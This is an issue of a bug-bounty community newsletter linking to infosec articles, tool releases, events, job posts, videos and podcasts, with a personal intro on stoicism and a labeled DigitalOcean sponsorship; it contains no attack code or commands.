Hive Five 45 – The Alchemist

Hi friends,

Greetings from the hive!

I hope all is well. Last week, I read the following article, which made an impact on me The Shortness of Life: Seneca on Busyness and the Art of Living Wide Rather Than Living Long.

Coincidentally, STÖK also mentioned that time is the most precious thing in life.

I'll most certainly be reading more about stoicism. What's been on your mind?

Let's take this week by swarm!

🐝 The Bee's Knees

1. David reacting to himself finding an SSRF vulnerability in Google Cloud: The raw report he has sent to the Google VRP team, with all additional comments.

2. How to clean install macOS Big Sur and configure operating system for privacy: In this episode, you explore how to clean install macOS Big Sur and configure operating system for privacy.

3. grimm-co / NotQuite0DayFriday: This repository documents real bugs in real software. At the time of disclosure the most recent versions were patched. Seeing mistakes that were made in the past can be a useful tool for seeing trends of bugs which make it past all the quality control processes.

4. Someone Made a Pirate Bay for NFTs: “Did you know that a NFT is just a hyperlink to an image that’s usually hosted on Google Drive or another web 2.0 host?”

5. Degrees and Credentials in InfoSec: If you’re on InfoSec Twitter You’ve probably seen the recent iteration of the neverending debate around degrees, certs, and InfoSec.

🙏🏻 Enjoy This Newsletter?

• Get $100 to try DigitalOcean. The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

💌 Want to sponsor an issue?

🔥 Buzzworthy

✅ Changelog

1. Dalfox v2.6 release: Improved scan performance and result/poc (add detail) and a new flag called --poc-type has been added.

2. Damn Vulnerable DeFi V2 release: New testing env, Solidity 0.8 + Hardhat + Ethers 4 new levels, New (broken) integrations with Uniswap v2, Gnosis Safe wallets, upgrades, timelocks, NFTs, and more.

3. Blind SSRF Chains mod_proxy addition: They've updated the glossary to contain the Apache mod_proxy SSRF PoC, affected versions and reference blog post.

4. BBRF v1.2: The Bug Bounty Reconnaissance Framework (BBRF) can help you coordinate your reconnaissance workflows across multiple devices.

5. Nuclei Templates v8.6.8: 48 New Templates, 10 Unique contributors, 2600+ Total number of templates.

📅 Events

1. Yet Another Security: Introducing our line-up of speakers for YASCON TALKS. Live on Nov 28.

2. DEFCAMP: conference - Nov 24-25 and hacking village - Nov 22-28.

3. BSides Ahmedabad launching Swag Store: Be on the lookout for the exclusive merchandise, 50% of the proceeds of the swag sales will go to GiveIndia Covid Response Fund.

4. InfoSec Black Friday Deals 2021: All the deals for InfoSec related software/tools this Black Friday / Cyber Monday.

🎉 Celebrate

1. yan gave their first guest lecture at Stanford: Let's go!

2. Farah was chilling at the Bugcrowd office: Awesome!

3. bxmbn received a big bounty: They only started last year on the November 23th. Congrats!

4. Ahsan bought a new laptop with bug bounties: Well deserved!

5. Canva Red Team scored a big bounty: They'll donate it to charity. Amazing!

💰 Career Corner

1. Open Zeppeling is hiring (web3): Are you a developer and want to get into web3? Or do you want to get paid to work in the most widely used open source Solidity library?

2. Cher evaluated the hiring process of different orgs: See what the process is like for people these days.

3. Resources on cybersecurity career paths.

4. Technical Project Manager at Bugcrowd: You will use your technical expertise to lead complex, multi-disciplinary projects from start to finish with our customers.

5. 11/15/2021 Cybersecurity Job Thread: Includes remote and entry level, and intern positions.

📰 Articles

1. Unauthenticated: Docker Edition: One of the goals with this series is to drive home the point that authentication (with properly implemented access controls) is essential to the security of your entire environment.

2. Sharpening your FRIDA scripting skills with Frida Tool: FridaLab Tool, an android application specially created to hone the Frida scripting skills on android.

3. 1 year anniversary of BugBountyHunter & our second Hackevent: The new dad life has been something interesting to adapt to, but zseano is loving every second of being a dad to his beautiful son.

4. Todayisnew and Hx01 on Collaboration: Unless you’ve been living under a rock, Bugcrowd expanded our Collaboration feature this year.

5. Hello World - From the Trenches: Cristi has no major life updates and no amazing achievements; just an ever growing love for life and simple living.

📚 Resources

1. STÖK dipped his toe into web3 and defi: More info and resources in replies.

2. Favorite Offsec/Osint resources 2 by ΜΔDΞRΔS.

3. Louis Nyffenegger asked what's the best way you learn?.

4. Clone of the arsenal, armory & library by Maderas: Their personal InfoSec/OffSec/OSINT/Hacking resources list & Study Resource "The Arsenal, Armory & Library".

5. Full Disclosure Mailing List: A public, vendor-neutral forum for detailed discussion of vulnerabilities and exploitation techniques, as well as tools, papers, news, and events of interest to the community.

🎥 Videos

1. HackTheBox - BountyHunter.

2. Testing Your Assumptions with Red Teaming.

3. SecConf 2021 - Ruby on Rails security by Louis Nyffenegger: Those who don't know history are destined to repeat it.

4. How to turn an XXE into an SSRF exploit: Learn how you can chain an XXE with an SSRF vulnerability to gain sensitive information.

5. 8 Biggest Cyber Heists Ever Pulled Off: These days, you can rob a bank over the Internet, from the other side of the world.

🎵 Audio

1. Mac Power Users - The 2021 MPU Gift Guide: Believe it or not, it is time for the annual MPU Holiday Gift Guide once again.

2. Cortex - State of the Apps 2022: Grey wants to talk about Focus, Myke is unhappy with communication, and they both discuss the tools and services they use for 'State of the Apps 2022'.

3. IndieHackers podcast #231 – Learning from Conversations with Andrew Warner of Mixergy.

4. The Alchemist: A Fable About Following Your Dream: I don't consume much fiction but thoroughly enjoyed this book.

Get $100 to try DigitalOcean - The go-to VPS for bug bounty hunters. I use it for all of my own recon and automation needs, plus it also doubles as a VPN. They have every cloud resource you need at an affordable price.

Subscribe to the Hive Five to read the rest.